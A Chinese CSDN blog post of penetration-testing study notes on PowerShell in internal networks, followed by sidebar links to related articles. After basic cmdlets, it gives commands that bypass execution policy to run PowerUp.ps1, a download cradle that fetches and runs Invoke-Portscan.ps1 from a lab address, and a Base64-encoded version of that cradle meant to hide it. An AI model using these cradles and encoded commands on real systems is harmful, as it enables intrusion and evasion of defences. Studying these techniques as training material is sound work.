内网-Powershell

最新推荐文章于 2024-07-24 10:35:36 发布
最新推荐文章于 2024-07-24 10:35:36 发布
阅读量130 收藏
点赞数
分类专栏: 内网 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liuzixuan0207/article/details/127688289
版权

执行策略

如果PowerShell脚本无法运行,可以使用Get-ExecutionPolicy查询当前的执行策略

  • Restricted:脚本不能运行(默认配置)
  • RemoteSigned:在本地创建的基甲苯可以运行,但从网上下载的脚本不能运行(有数字证书的除外)
  • AllSigned:仅当脚本由收信人的发布者签名时才能运行
  • Unrestricted:允许所有脚本运行

可以使用Set-ExecutionPolicy <policy name>来设置PowerShell的执行策略

Set-ExecutionPolicy Unrestricted

常用命令

  • 新建目录:New-Item directory -ItemType Directory
  • 新建文件:New-Item test.txt -ItemType File
  • 删除目录:Remove-Item directory
  • 显示文本内容:Get-Content test.txt
  • 设置文本内容:Set-Content test.txt -Value "I love you"
  • 追加内容:Add-Content test.txt -Value "I love you too"
  • 清除内容:Clear-Content test.txt
  1. 绕过本地权限并执行
powershell.exe -ExecutionPolicy Bypass -File .\PowerUp.ps1
powershell.exe -exec Bypass -Command "& {Import-Module C:\Users\Jonathan\Desktop\PowerUp.ps1; Invoke-AllChecks}"
  1. 从网站服务器中下载脚本,绕过本地权限并隐藏执行
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).Downloadfile('http://192.168.62.130/Inv
oke-Portscan.ps1','Invoke-Portscan.ps1')";Import-Module .\Invoke-Portscan.ps1;Invoke-Portscan -Hosts 192.168.62.130
  1. 使用Base64对PowerShell命令进行编码
echo "iex(New-Object Net.WebClient).DownloadString('http://192.168.62.130/Invoke-Portsc
an.ps1');Invoke-Portscan -Hosts 192.168.1.1/24" > raw.txt
./ps_encoder.py -s raw.txt

powershell.exe -exec bypass -enc aQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA2ADIALgAxADMAMAAvAEkAbgB2AG8AawBlAC0AUABvAHIAdABzAGMAYQBuAC4AcABzADEAJwApADsASQBuAHYAbwBrAGUALQBQAG8AcgB0AHMAYwBhAG4AIAAtAEgAbwBzAHQAcwAgADEAOQAyAC4AMQA2ADgALgAxAC4AMQAvADIANAAKAA==
ssp@
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网-powershell 基础
战神/calmness的博客
04-29 441
powershell 基础 目录 powershell 基础 Powershell的特点: Powershell的基本概念 Powershell 的常用命令 (1) 绕过本地权限并执行 (2) 从网站服务器中下载脚本,绕过本地权限并隐藏执行 (3)使用Base64 对powershell 命令进行编码 powershell 是一种命令行外壳程序和脚本环境,它内置在每个受支持的...
在远程计算机运行PowerShell命令
weixin_34133829的博客
12-21 350
在远程计算机运行PowerShell命令检查PowerShell Remoting是否启用在Windows Server 2008 R2上以管理员身份运行PowerShell,然后输入Enter-PSSession -ComputerName localhost返回如下截图:说明该版本默认是没有启用PowerShell Remoting功能。在Windows Server 2012 R2上,返回如...
Bat+PowerShell实现windows网络一键共享
qq_34907927的博客
02-24 3679
当需要将笔记本WLAN通过 有线共享台式机 (同时可以便于远程),或者 虚拟机的虚拟适配器 时,由于win10关机共享失效,需要进控制面板反复点击,操作繁琐,本文给出脚本双击共享方案。 1. 新建文本文档,命名为ShareInternet.ps1 填充内容如下: $NetShare = New-Object -ComObject HNetCfg.HNetShare $wlan = $null $ethernet = $null foreach ($int in $NetShare.EnumEveryCo
内网安全攻防读书笔记(2)——powershell基础
qq_40909772的博客
11-26 3662
文章目录1.基本概念1.1 .ps1文件1.2 执行策略1.3 管道2.常用命令2.1 文件操作命令2.2 绕过本地权限并执行2.3 使用base64对PowerShell命令进行编码2.3 运行32位和64位powershell   powershell是windows的一种命令行外壳程序。只要一台计算机上可以运行代码,就可以将powershell脚本文件执行,甚至无需写入到磁盘中。powershell拥有以下几个重要的特点: 脚本可以在内存中运行,不需要写入到磁盘中。 可以远程执行。 可用于管理活动目
利用powershell打开远程连接所需要的一些功能
virtualping的博客
12-21 1030
powershell远程连接
Powershell内网渗透中的利用
纸房子
09-13 3612
Powershell作为CMD的增强版,因为其可以直接调用.Net及COM对象而实现许多CMD无法实现的功能,所以在Windows在使用Powershell成为了更多人的首选,同时也吸引了黑客,各种花式调用在内网渗透中。借鉴网上各种资料,记录总结一下。
内网渗透--powershell简介
shayebudon的博客
03-29 3569
windows powershell基础 Powershell 是运行在windows机器上实现系统和应用程序管理自动化的命令行脚本环境。你可以把它看成是命令行提示符cmd.exe的扩充 powershell命令和参数不区分大小写
POWERSHELL_内网渗透实例.pdf
08-07
目录 1.POWERSHELL简介 2.POWERSPLOIT 3.内网渗透实例
AHZY-内网安全攻防2020-01-12 内网安全攻防知识分享,
08-20
内网安全攻防是网络安全领域中的重要组成部分,尤其是在企业或组织内部,内网安全性直接影响到数据保护和业务连续性。以下是对内网安全攻防知识的详细解析: 一、内网信息搜集 内网信息搜集是攻击者进行渗透测试...
「信息安全POWERSHELL_内网渗透实例 - 网络安全.zip
12-01
「信息安全POWERSHELL_内网渗透实例 - 网络安全 渗透测试 数据安全 数据安全 防火墙 安全建设
powershell快速扫描网络主机多功能版
04-24
powershell,多线程,sockect通讯,webapi,不仅能扫描单个IP,包含外网主机内网主机和本地内网,还能扫描局域网整个网段,带自定义端口扫描,还加入了文件共享资源探测功能,此工具只能用于检查网络,不能用于任何...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8346
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
最新发布
lupai的博客
07-24 320
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 956
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
亚信安全官方账号的博客
07-19 581
一站式云安全托管限时试用 开启全能高效攻防
防火墙--内容安全
banliyaoguai的博客
07-20 1210
内容安全是指对互联网上的内容进行监测、筛选和管理,以确保用户在浏览、使用互联网内容时的安全和合法性。各个厂商在进行内容安全的检测、分析和处理的过程被称为引擎。下面以华为IAE引擎来对内容安全进行学习ID:区分不同的签名对象:服务器,客户端。一般我们将发起连接的设备角色认定为客户端,响应连接并提供服务的角色认定为服务器。严重性:该行为一旦爆发之后,对我们网络系统的影响程度的评级协议/应用程序:这种攻击所承载的协议或者应用。
服务攻防-框架安全(漏洞复现)
m0_74402888的博客
07-21 564
Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315。运行dockers容器。
防火墙之内容安全过滤技术篇
qq_67758645的博客
07-19 652
IMAP是一种在线协议,它不用将邮件下载到本地,可以在多台支持IMAP协议的设备上同时进行文件的操作,它会将用户的操作同步到服务器上,实现邮件的共享和同步。而IMAP协议支持双向通信,用户可以在不同的设备上对邮件进行标记、移动、删除等操作,这些操作会实时同步到服务器上,确保邮件状态的一致性。IMAP允许邮件保留在服务器上,用户可以在任何支持IMAP的设备上访问这些邮件,实现邮件的同步和共享。可以执行的动作 --- 告警,阻断,按权重操作 -- 我们可以给每个关键字设置权重值,之后根。(一定时间后会删除)
windows内网渗透powershell
10-14
在Windows内网渗透中,PowerShell是一个非常强大的工具,可以用于执行各种攻击和渗透技术。以下是一些常见的PowerShell攻击和渗透技术: 1. 使用PowerShell Empire进行横向移动和持久化 2. 使用PowerShell进行密码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值